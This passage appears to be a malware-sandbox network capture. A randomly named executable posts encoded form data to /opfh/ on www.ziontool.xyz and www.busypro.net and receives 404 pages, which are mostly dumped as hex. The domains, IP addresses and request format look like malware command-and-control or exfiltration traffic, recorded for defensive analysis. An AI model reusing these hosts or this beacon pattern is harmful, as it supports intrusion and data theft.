                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.763188203.161.43.227802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:53.799957991 CEST1744OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.ziontool.xyz
                            Origin: http://www.ziontool.xyz
                            Referer: http://www.ziontool.xyz/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 56 57 45 41 79 2f 77 33 4a 59 6f 31 31 50 68 67 79 58 6f 2f 42 35 79 38 68 33 38 69 35 4d 49 79 64 6a 44 79 64 52 48 49 72 74 4e 70 65 70 6a 37 6c 2b 59 65 6d 6a 71 4b 75 6b 57 4b 4a 77 37 36 6c 51 65 31 38 48 42 67 47 33 35 4b 4f 42 46 6d 32 77 47 4b 4b 2b 54 4e 2b 59 50 44 36 45 32 66 66 64 2f 30 73 50 43 6a 6c 34 74 6e 44 72 41 39 63 31 72 63 4c 50 46 4a 71 62 41 6f 58 4d 36 4d 72 50 6a 68 45 6b 6f 75 59 32 67 34 55 31 67 6f 36 50 53 68 79 38 43 65 36 4b 30 67 75 4a 72 4e 6d 33 53 67 55 4a 2b 6c 66 6f 51 6d 2f 51 51 57 44 32 72 33 7a 2b 44 69 59 6a 59 30 6e 72 38 54 41 4e 34 64 66 64 7a 41 64 62 74 51 36 53 39 47 37 76 47 75 6b 35 38 42 6c 54 32 37 63 78 37 77 59 50 42 6e 68 53 4c 76 48 39 5a 6d 51 5a 59 54 57 44 4e 6d 30 45 48 6b 38 6c 65 48 37 53 4f 47 67 32 65 66 75 76 33 6c 41 77 2f 32 62 4c 4e 4b 30 4c 31 32 7a 54 58 78 6e 4e 43 5a 52 61 44 79 66 2f 66 38 71 36 6a 41 6e 31 78 61 54 50 62 74 77 42 38 64 57 52 4e 48 5a 4d 4b 6e 6b 31 35 4e 30 37 50 57 56 32 72 6c 71 2b 58 5a [TRUNCATED]
                            Data Ascii: R40L6=VWEAy/w3JYo11PhgyXo/B5y8h38i5MIydjDydRHIrtNpepj7l+YemjqKukWKJw76lQe18HBgG35KOBFm2wGKK+TN+YPD6E2ffd/0sPCjl4tnDrA9c1rcLPFJqbAoXM6MrPjhEkouY2g4U1go6PShy8Ce6K0guJrNm3SgUJ+lfoQm/QQWD2r3z+DiYjY0nr8TAN4dfdzAdbtQ6S9G7vGuk58BlT27cx7wYPBnhSLvH9ZmQZYTWDNm0EHk8leH7SOGg2efuv3lAw/2bLNK0L12zTXxnNCZRaDyf/f8q6jAn1xaTPbtwB8dWRNHZMKnk15N07PWV2rlq+XZALpeNUMB7KtZVEABn/mpe5IcO915n2WwN8vgACmNG1H7lZz8UzM0/GiN/rW5IHaDLd+ucNGfrvo8GwxkX84SfAjTg9Mdtvwh0zLITYHe5tMdgYLvJy6gG6Ayq+72R5Pxcsve9huxdHtiWqt+EVk69/0YOahw80ZODboczS3Hm5fQsPcI3zSJauFbcJX+TKiVQZPhfIultnQpbq4NDUc+Wi8LVj6Nltn8rvRZrvlO7VakXjRXh9eIu5S8e21GxeOSW1Uow5riT/MHOd5ZVOuHufrYdeycWkX/rTwwA4yEbRq7xWxlYnw3CPtDlYveVJQIHPr/TBOoJZOZv2QEirrwPxyxyfI8+y5jXlOzCtJba8tJ3zbseCVryRkoB24qSBCXOjwhZ8YOxXevFwQKLGa1L9qUn1B7oLijMewZAlbD0YfHV4fN9YkkkNZ2/D96lPxG8dNg9aE4Z8EI5xI3wekJbuCR00tKdkYtqHQEgqyJWOa7+WaPsyrvqtvhbqohDJS5590/M2qusG1OYbSBpJxV9ILEmQdDu1j3g6set5T4K02UvsbOKoU/jPRJIky2ZO+aHhauExZtLlu/l5ZKNq0687yS9SSJ+IMH25MuTegC26GGjgbYb1kPsio7EZXkl/ZdwMXJdrpOHJi6BeBi9H6YCSJokNeupm0tTV [TRUNCATED]
                            May 27, 2024 12:21:54.432296038 CEST1236INHTTP/1.1 404 Not Found
                            Date: Mon, 27 May 2024 10:21:54 GMT
                            Server: Apache
                            Content-Length: 38381
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                            May 27, 2024 12:21:54.432318926 CEST1236INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                            Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27
                            May 27, 2024 12:21:54.432332039 CEST448INData Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65
                            Data Ascii: <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/>
                            May 27, 2024 12:21:54.432342052 CEST1236INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 35 36 2e 39 22 20 63 79 3d 22 38 30 35 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                            Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="456.9" cy="805.7" r="3.7" transform="translate(-317 296.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="440.5" cy="813.7" r="3.7" transform="translate(-322.5 290.2) rotate(-27.1
                            May 27, 2024 12:21:54.432354927 CEST1236INData Raw: 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 36 2e 38 22 20 63 79 3d 22 38 30 35 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 38 20 33 33 33 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37
                            Data Ascii: <circle cx="536.8" cy="805.3" r="3.7" transform="translate(-308 333.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="539.2" cy="787.7" r="3.7" transform="translate(-299.8 332.3) rotate(-27.1)" style="fill: #ffe029"/> <c
                            May 27, 2024 12:21:54.432364941 CEST448INData Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 31 2e 37 20 33 35 34 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09
                            Data Ascii: ="3.7" transform="translate(-291.7 354.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="608.2" cy="784.4" r="3.7" transform="translate(-290.7 363.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="612.4" cy="765.8" r=
                            May 27, 2024 12:21:54.432374954 CEST1236INData Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 34 20 33 37 30 2e 38 29 20 72 6f 74 61 74 65
                            Data Ascii: <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/> <cir
                            May 27, 2024 12:21:54.432385921 CEST1236INData Raw: 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20
                            Data Ascii: 6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7
                            May 27, 2024 12:21:54.432399988 CEST448INData Raw: 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 31 2e 39 22 20 63 79 3d 22 37 31 34
                            Data Ascii: 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7
                            May 27, 2024 12:21:54.432622910 CEST1236INData Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09
                            Data Ascii: ="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r=
                            May 27, 2024 12:21:54.437330961 CEST1236INData Raw: 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 37 2e 35 22 20 63 79 3d
                            Data Ascii: e(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-25


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.763189203.161.43.227802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:56.331665039 CEST456OUTGET /opfh/?R40L6=YUsgxJYlBZRF0No39lc3JbqbmV5Q7LZCTky4dVHopuN0Ho35s4wXwSWKkFKDUjWggieTnElUH3EcFS8A7QGjP8jAu/34q2WYLtH3kt2+sJ07P+s7RD70L6colfRzV4eR9N3BYmYWcCpx&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.ziontool.xyz
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:21:56.933429956 CEST1236INHTTP/1.1 404 Not Found
                            Date: Mon, 27 May 2024 10:21:56 GMT
                            Server: Apache
                            Content-Length: 38381
                            Connection: close
                            Content-Type: text/html; charset=utf-8
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                            May 27, 2024 12:21:56.933455944 CEST1236INData Raw: 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38
                            Data Ascii: 98.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 29
                            May 27, 2024 12:21:56.933466911 CEST1236INData Raw: 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e
                            Data Ascii: fe029"/> <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ff
                            May 27, 2024 12:21:56.933478117 CEST1236INData Raw: 20 63 79 3d 22 37 38 34 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 31 2e 37 20 33 31 37 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23
                            Data Ascii: cy="784" r="3.7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy
                            May 27, 2024 12:21:56.933490992 CEST896INData Raw: 72 61 6e 73 6c 61 74 65 28 2d 33 31 30 2e 39 20 33 34 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d
                            Data Ascii: ranslate(-310.9 341.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="570.5" cy="807.2" r="3.7" transform="translate(-305.2 348.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="tr
                            May 27, 2024 12:21:56.933581114 CEST1236INData Raw: 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e
                            Data Ascii: fe029"/> <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/
                            May 27, 2024 12:21:56.933600903 CEST1236INData Raw: 79 3d 22 37 30 31 2e 33 22 20 72 3d 22 33 2e 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23
                            Data Ascii: y="701.3" r="3.6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy
                            May 27, 2024 12:21:56.933613062 CEST448INData Raw: 72 61 6e 73 6c 61 74 65 28 2d 32 37 30 2e 36 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d
                            Data Ascii: ranslate(-270.6 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="tr
                            May 27, 2024 12:21:56.933626890 CEST1236INData Raw: 34 22 20 63 79 3d 22 36 39 31 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c
                            Data Ascii: 4" cy="691.3" r="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8
                            May 27, 2024 12:21:56.933656931 CEST1236INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65
                            Data Ascii: sform="translate(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform
                            May 27, 2024 12:21:56.938652992 CEST1236INData Raw: 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 39 22 20 63 79 3d 22 37 36 35 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                            Data Ascii: -27.1)" style="fill: #ffe029"/> <circle cx="509" cy="765.9" r="3.7" transform="translate(-293.1 316.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="512" cy="748.1" r="3.7" transform="translate(-284.7 315.5) rotate(-27.1


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.763190160.251.148.118802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:22:02.706582069 CEST708OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.busypro.net
                            Origin: http://www.busypro.net
                            Referer: http://www.busypro.net/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 39 6d 52 32 6c 48 4d 77 6c 71 56 36 75 75 51 72 4d 49 7a 6b 6c 4a 57 79 53 6f 58 79 4d 59 58 5a 48 36 62 72 71 69 69 33 79 61 77 4d 50 57 52 30 37 4d 78 38 51 76 76 59 6f 51 69 47 44 64 71 39 71 30 46 71 6c 5a 57 66 7a 64 4d 74 54 6d 42 6f 46 6c 77 4e 38 74 4a 51 69 70 33 33 76 6c 52 7a 31 77 44 58 70 49 2b 52 4d 53 54 43 7a 6f 4e 33 68 61 66 39 46 78 64 4d 50 50 55 57 52 46 61 57 41 59 45 75 75 63 36 49 50 4b 6e 62 4d 6c 70 59 57 45 68 37 36 4c 50 30 74 47 61 44 58 63 42 42 54 72 30 6a 43 37 7a 6f 57 66 41 76 63 54 62 64 58 42 2b 30 70 44 31 79 43 71 31 52 32 4d 48 73 4b 6c 68 59 57 47 48 4d 65 51 47 47 66 49 65 72 42 77 3d 3d
                            Data Ascii: R40L6=9mR2lHMwlqV6uuQrMIzklJWySoXyMYXZH6brqii3yawMPWR07Mx8QvvYoQiGDdq9q0FqlZWfzdMtTmBoFlwN8tJQip33vlRz1wDXpI+RMSTCzoN3haf9FxdMPPUWRFaWAYEuuc6IPKnbMlpYWEh76LP0tGaDXcBBTr0jC7zoWfAvcTbdXB+0pD1yCq1R2MHsKlhYWGHMeQGGfIerBw==
                            May 27, 2024 12:22:03.528032064 CEST377INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Mon, 27 May 2024 10:22:03 GMT
                            Content-Type: text/html; charset=iso-8859-1
                            Transfer-Encoding: chunked
                            Connection: close
                            Content-Encoding: gzip
                            Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
